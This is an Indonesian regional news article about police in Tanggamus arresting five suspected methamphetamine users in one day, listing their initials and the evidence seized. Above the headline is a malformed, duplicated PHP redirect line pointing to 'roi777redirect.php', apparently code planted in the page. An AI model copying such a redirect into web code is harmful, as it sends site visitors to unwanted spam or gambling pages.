header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Polres Tanggamus Garuk 5 Penyalahguna Sabu-Sabu dalam Sehari -
Polres Tanggamus Garuk 5 Penyalahguna Sabu-Sabu dalam Sehari
GARUK LIMA ORANG: Dalam satu hari, Satuan Reserse Narkoba Polres Tanggamus menciduk empat tersangka penyalahguna sabu-sabu ditambah satu orang yang diamankan personel Polsek Talangpadang. (Foto: HUMAS POLRES TANGGAMUS)

TRANSLAMPUNG.COM, TANGGAMUS Kepolisian Resor Tanggamus dan polsek jajaran terus bekerja ekstra memberantas peredaran narkoba. Itu dibuktikan dengan dijaringnya empat tersangka penyalahguna sabu-sabu dari wilayah Kecamatan Wonosobo dan Gisting, Rabu (11/7). Di hari yang sama, Polsek Talangpadang juga mengamankan satu orang yang juga diduga menyalahgunakan serbuk metamfetamin itu.

Kasatres Narkoba Polres Tanggamus Iptu. Anton Saputra menjelaskan, empat tersangka merupakan hasil penangkapan dari dua tempat kejadian perkara (TKP) yang berbeda, yaitu wilayah Kecamatan Wonosobo dan Gisting. Pada Rabu (11/7) pukul 01.00 WIB, diamankan AB (24) di Pekon Wonosobo, Kecamatan Wonosobo.

“Dari AB, kami amankan barang bukti berupa 35 plastik klip isi sabu seberat 14 gram, 1 unit timbangan digital, 2 buah dompet, 2 unit handphone, 2 bundel plastik klip kosong, dan 3 buah sedotan,” ujar Anton Saputra, mewakili Kapolres Tanggamus AKBP I Made Rasma, Kamis (12/7) sore.

Tidak berhenti sampai di situ, Satres Narkoba terus bergerak. Alhasil kembali melakukan penggerebegan terduga di Pekon Campang Kecamatan Gisting, sekitar pukul 02.30 WIB. Tepatnya di Pekon Campang.

“Dari TKP di Pekon Campang ini, kami amankan tiga tersangka penyalahguna narkoba. Jenisnya sama seperti TKP yang dari Wonosobo, yaitu sabu-sabu,” ungkap Anton Saputra.

Ketiga tersangka yang dari TKP Pekon Campang, kasatres narkoba menyebutkan, masing-masing berinisial YP (21), WL (18), dan RS (21). YP dan WL merupakan warga Pekon Campang. Sementara RS beralamat di Pekon Gisting.

Anton menuturkan, dari ketiganya, petugas juga mengamankan barang bukti pipa kaca (pirek), gulungan alumunium foil, sedotan, dan handphone merk Xiaomi.

Anton Saputra menegaskan, Polres Tanggamus akan terus mengungkap penyalahgunaan narkoba di wilayah hukumnya. Bahkan bila diperlukan, para penyalahguna atau pengedar akan ditindak tegas.

“Saat ini keempat tersangka berikut barang bukti diamankan di Mapolres Tanggamus guna penyidikan lebih lanjut,” tandas Anton Saputra di ruangannya.

Pada hari yang sama, Polsek Talangpadang juga berhasil mengamankan seorang pria berinisial BA (22). Warga Pekon Sinarbanten, Kecamatan Talangpadang itu terpaksa digelandang ke mapolsek lantaran diduga menyalahgunakan sabu-sabu, pada Rabu (11/7) pukul 16.00 WIB.

Kapolsek Talangpadang AKP Yoffi Kurniawan menjelaskan, dari tangan BA, pihaknya mendapatkan barang bukti berupa plastik kecil berisi kristal diduga sabu, korek gas, dan pipet. Barang-barang tersebut disimpan dalam sebuah dompet oleh tersangka.

“BA kami amankan saat melintas di jalan raya Pekon Sinarbanten. Guna penyelidikan lebih lanjut, saat ini BA berikut barang bukti kami amankan di Mapolsek Talangpadang,” pungkas Yoffi Kurniawan. (ayp)

News Reporter
Kepala Biro Tanggamus